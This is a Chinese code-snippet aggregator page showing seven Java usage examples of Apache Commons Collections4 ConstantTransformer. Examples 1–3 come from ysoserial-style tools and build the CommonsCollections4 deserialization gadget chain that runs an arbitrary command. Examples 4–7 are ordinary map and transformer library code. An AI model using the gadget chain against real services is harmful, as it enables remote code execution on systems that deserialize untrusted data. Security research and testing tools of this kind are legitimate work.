本文整理汇总了Java中org.apache.commons.collections4.functors.ConstantTransformer类的典型用法代码示例。如果您正苦于以下问题:Java ConstantTransformer类的具体用法?Java ConstantTransformer怎么用?Java ConstantTransformer使用的例子?那么恭喜您, 这里精选的类代码示例或许可以为您提供帮助。
ConstantTransformer类属于org.apache.commons.collections4.functors包,在下文中一共展示了ConstantTransformer类的7个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Java代码示例。
示例1: getObject
import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
public Queue<Object> getObject(final String command) throws Exception {
Object templates = Gadgets.createTemplatesImpl(command);
ConstantTransformer constant = new ConstantTransformer(String.class);
// mock method name until armed
Class[] paramTypes = new Class[] { String.class };
Object[] args = new Object[] { "foo" };
InstantiateTransformer instantiate = new InstantiateTransformer(
paramTypes, args);
// grab defensively copied arrays
paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");
ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });
// create queue with numbers
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
queue.add(1);
queue.add(1);
// swap in values to arm
Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
paramTypes[0] = Templates.class;
args[0] = templates;
return queue;
}
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:30,代码来源:CommonsCollections4.java
示例2: getObject
import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
public Queue<Object> getObject(CmdExecuteHelper cmdHelper) throws Exception {
Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());
ConstantTransformer constant = new ConstantTransformer(String.class);
// mock method name until armed
Class[] paramTypes = new Class[] { String.class };
Object[] args = new Object[] { "foo" };
InstantiateTransformer instantiate = new InstantiateTransformer(
paramTypes, args);
// grab defensively copied arrays
paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");
ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });
// create queue with numbers
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
queue.add(1);
queue.add(1);
// swap in values to arm
Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
paramTypes[0] = Templates.class;
args[0] = templates;
return queue;
}
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:31,代码来源:CommonsCollections4.java
示例3: getObject
import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
public Queue<Object> getObject(final String command) throws Exception {
TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
ConstantTransformer constant = new ConstantTransformer(String.class);
// mock method name until armed
Class[] paramTypes = new Class[] { String.class };
Object[] args = new Object[] { "foo" };
InstantiateTransformer instantiate = new InstantiateTransformer(
paramTypes, args);
// grab defensively copied arrays
paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");
ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });
// create queue with numbers
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
queue.add(1);
queue.add(1);
// swap in values to arm
Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
paramTypes[0] = Templates.class;
args[0] = templates;
return queue;
}
开发者ID:NetSPI,项目名称:JavaSerialKiller,代码行数:30,代码来源:CommonsCollections4.java
示例4: defaultedMap
import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
/**
* Factory method to create a defaulting map.
* <p>
* The value specified is returned when a missing key is found.
*
* @param <K> the key type
* @param <V> the value type
* @param map the map to decorate, must not be null
* @param defaultValue the default value to return when the key is not found
* @return a new defaulting map
* @throws NullPointerException if map is null
* @since 4.0
*/
public static <K, V> DefaultedMap<K, V> defaultedMap(final Map<K, V> map, final V defaultValue) {
return new DefaultedMap<K, V>(map, ConstantTransformer.constantTransformer(defaultValue));
}
开发者ID:funkemunky,项目名称:HCFCore,代码行数:17,代码来源:DefaultedMap.java
示例5: DefaultedMap
import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
/**
* Constructs a new empty <code>DefaultedMap</code> that decorates
* a <code>HashMap</code>.
* <p>
* The object passed in will be returned by the map whenever an
* unknown key is requested.
*
* @param defaultValue the default value to return when the key is not found
*/
public DefaultedMap(final V defaultValue) {
this(ConstantTransformer.constantTransformer(defaultValue));
}
开发者ID:funkemunky,项目名称:HCFCore,代码行数:13,代码来源:DefaultedMap.java
示例6: nullTransformer
import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
/**
* Gets a transformer that always returns null.
*
* @param <I> the input type
* @param <O> the output type
* @return the transformer
* @see ConstantTransformer
*/
public static <I, O> Transformer<I, O> nullTransformer() {
return ConstantTransformer.nullTransformer();
}
开发者ID:funkemunky,项目名称:HCFCore,代码行数:12,代码来源:TransformerUtils.java
示例7: constantTransformer
import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
/**
* Creates a Transformer that will return the same object each time the
* transformer is used.
*
* @param <I> the input type
* @param <O> the output type
* @param constantToReturn the constant object to return each time in the transformer
* @return the transformer.
* @see ConstantTransformer
*/
public static <I, O> Transformer<I, O> constantTransformer(final O constantToReturn) {
return ConstantTransformer.constantTransformer(constantToReturn);
}
开发者ID:funkemunky,项目名称:HCFCore,代码行数:14,代码来源:TransformerUtils.java
注:本文中的org.apache.commons.collections4.functors.ConstantTransformer类示例整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
请发表评论